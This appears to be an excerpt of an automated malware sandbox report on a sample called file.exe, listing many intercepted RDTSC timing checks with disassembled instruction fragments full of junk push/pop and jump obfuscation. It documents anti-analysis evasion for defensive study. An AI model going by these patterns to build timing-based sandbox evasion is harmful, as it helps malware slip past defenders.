            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A1BF second address: 58A1CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4664873C08h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588B18 second address: 588B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F466483F64Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588B3A second address: 588B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588B3E second address: 588B44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588B44 second address: 588B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4664873C10h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F4664873C0Ah 0x00000017 jnp 00007F4664873C0Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588B72 second address: 588B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588D03 second address: 588D1B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4664873C12h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 588FF0 second address: 58900E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F658h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58900E second address: 589012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58919B second address: 5891CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F466483F655h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F466483F653h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58934A second address: 589354 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4664873C0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5894BD second address: 5894C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5894C8 second address: 5894DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push esi 0x0000000a jnp 00007F4664873C0Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589EE4 second address: 589EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589EE9 second address: 589EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589EFB second address: 589F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD2B3 second address: 5AD2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnl 00007F4664873C06h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD2C2 second address: 5AD2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C30E6 second address: 5C311B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C18h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F4664873C11h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C311B second address: 5C3123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C20B0 second address: 5C20CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F4664873C15h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C20CD second address: 5C20DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F466483F64Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C20DA second address: 5C20E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2243 second address: 5C2247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2558 second address: 5C255E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C255E second address: 5C2562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2B18 second address: 5C2B28 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4664873C06h 0x00000008 jnl 00007F4664873C06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2C74 second address: 5C2C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2C78 second address: 5C2C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2E30 second address: 5C2E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C46F2 second address: 5C46F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C46F8 second address: 5C46FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6EE7 second address: 5C6EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C700E second address: 5C7013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD221 second address: 4DD227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD227 second address: 4DD22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30343 second address: 4C30381 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov al, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4664873C0Eh 0x00000011 push eax 0x00000012 jmp 00007F4664873C0Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4664873C15h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30381 second address: 4C303A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F466483F64Dh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C303A7 second address: 4C303FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4664873C13h 0x00000015 add ecx, 298358AEh 0x0000001b jmp 00007F4664873C19h 0x00000020 popfd 0x00000021 mov esi, 695FE937h 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3042B second address: 4C3045B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F652h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F466483F657h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3045B second address: 4C30460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5069C second address: 4C506CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F466483F651h 0x0000000a or esi, 6D6093A6h 0x00000010 jmp 00007F466483F651h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C506CB second address: 4C506FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e mov edi, eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4664873C13h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C506FF second address: 4C5073D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F466483F657h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 movzx esi, dx 0x00000016 mov ax, di 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F466483F64Fh 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5073D second address: 4C50743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50743 second address: 4C50747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50747 second address: 4C5074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5074B second address: 4C50762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F466483F64Ah 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50762 second address: 4C50795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 9B74h 0x00000007 mov dl, FAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F4664873C10h 0x00000016 add esi, 19F71D28h 0x0000001c jmp 00007F4664873C0Bh 0x00000021 popfd 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50795 second address: 4C50799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50799 second address: 4C50803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F4664873C11h 0x00000010 call 00007F4664873C10h 0x00000015 pop ecx 0x00000016 pop ebx 0x00000017 pushfd 0x00000018 jmp 00007F4664873C10h 0x0000001d add ecx, 7E2231E8h 0x00000023 jmp 00007F4664873C0Bh 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4664873C15h 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50803 second address: 4C50889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-04h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F466483F652h 0x00000014 or ah, FFFFFFA8h 0x00000017 jmp 00007F466483F64Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e pushfd 0x0000001f jmp 00007F466483F64Fh 0x00000024 adc eax, 44266BEEh 0x0000002a jmp 00007F466483F659h 0x0000002f popfd 0x00000030 pop esi 0x00000031 popad 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 call 00007F466483F659h 0x0000003b pop eax 0x0000003c mov bx, 1C44h 0x00000040 popad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50889 second address: 4C508C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4664873C0Dh 0x00000015 sbb cx, C436h 0x0000001a jmp 00007F4664873C11h 0x0000001f popfd 0x00000020 mov di, ax 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50955 second address: 4C5095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50A0F second address: 4C50A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4664873C0Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50A1F second address: 4C50084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d call 00007F466483F654h 0x00000012 mov si, 1E91h 0x00000016 pop esi 0x00000017 popad 0x00000018 leave 0x00000019 jmp 00007F466483F658h 0x0000001e retn 0004h 0x00000021 nop 0x00000022 sub esp, 04h 0x00000025 xor ebx, ebx 0x00000027 cmp eax, 00000000h 0x0000002a je 00007F466483F795h 0x00000030 xor eax, eax 0x00000032 mov dword ptr [esp], 00000000h 0x00000039 mov dword ptr [esp+04h], 00000000h 0x00000041 call 00007F466918B19Bh 0x00000046 mov edi, edi 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F466483F657h 0x0000004f or si, F70Eh 0x00000054 jmp 00007F466483F659h 0x00000059 popfd 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F466483F64Eh 0x00000061 or cx, 5D88h 0x00000066 jmp 00007F466483F64Bh 0x0000006b popfd 0x0000006c mov di, cx 0x0000006f popad 0x00000070 popad 0x00000071 xchg eax, ebp 0x00000072 jmp 00007F466483F652h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F466483F64Eh 0x0000007f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50084 second address: 4C50096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4664873C0Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50096 second address: 4C500D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F466483F64Bh 0x00000015 sbb ch, FFFFFF8Eh 0x00000018 jmp 00007F466483F659h 0x0000001d popfd 0x0000001e mov bx, ax 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500D8 second address: 4C500DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500DE second address: 4C500FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F466483F64Bh 0x0000000f push FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500FB second address: 4C50116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50116 second address: 4C5011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5011C second address: 4C50120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50120 second address: 4C50156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 09DD3761h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F466483F650h 0x00000018 pop eax 0x00000019 jmp 00007F466483F64Bh 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50156 second address: 4C50192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7ED0A929h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F4664873C13h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50192 second address: 4C50197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50197 second address: 4C5019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5019D second address: 4C501A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501A1 second address: 4C501B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 1A58C00Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 mov ah, bh 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501B6 second address: 4C501E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 330F5700h 0x00000008 call 00007F466483F659h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 add dword ptr [esp], 5CAF6B64h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501E8 second address: 4C501EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501EC second address: 4C501F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501F0 second address: 4C501F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501F6 second address: 4C5021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F466483F650h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5021F second address: 4C5022E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5022E second address: 4C5026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F466483F64Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F466483F64Eh 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5026B second address: 4C502A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F4664873C16h 0x0000000f sub esp, 18h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F4664873C0Ch 0x0000001a pop ecx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C502A4 second address: 4C502A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C502A8 second address: 4C502D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 mov dx, cx 0x0000000c movzx esi, dx 0x0000000f popad 0x00000010 mov dword ptr [esp], ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4664873C18h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C502D5 second address: 4C502DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, AE64h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C502DE second address: 4C50339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007F4664873C16h 0x0000000d mov dword ptr [esp], esi 0x00000010 jmp 00007F4664873C10h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4664873C0Dh 0x0000001f or cx, 32B6h 0x00000024 jmp 00007F4664873C11h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50339 second address: 4C503A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, FFF9h 0x00000007 mov cx, A2B5h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F466483F64Bh 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F466483F654h 0x0000001c sub ax, 6838h 0x00000021 jmp 00007F466483F64Bh 0x00000026 popfd 0x00000027 movzx eax, di 0x0000002a popad 0x0000002b mov eax, dword ptr [770E4538h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F466483F64Ch 0x00000039 xor si, 6298h 0x0000003e jmp 00007F466483F64Bh 0x00000043 popfd 0x00000044 movzx ecx, dx 0x00000047 popad 0x00000048 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503A9 second address: 4C503AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
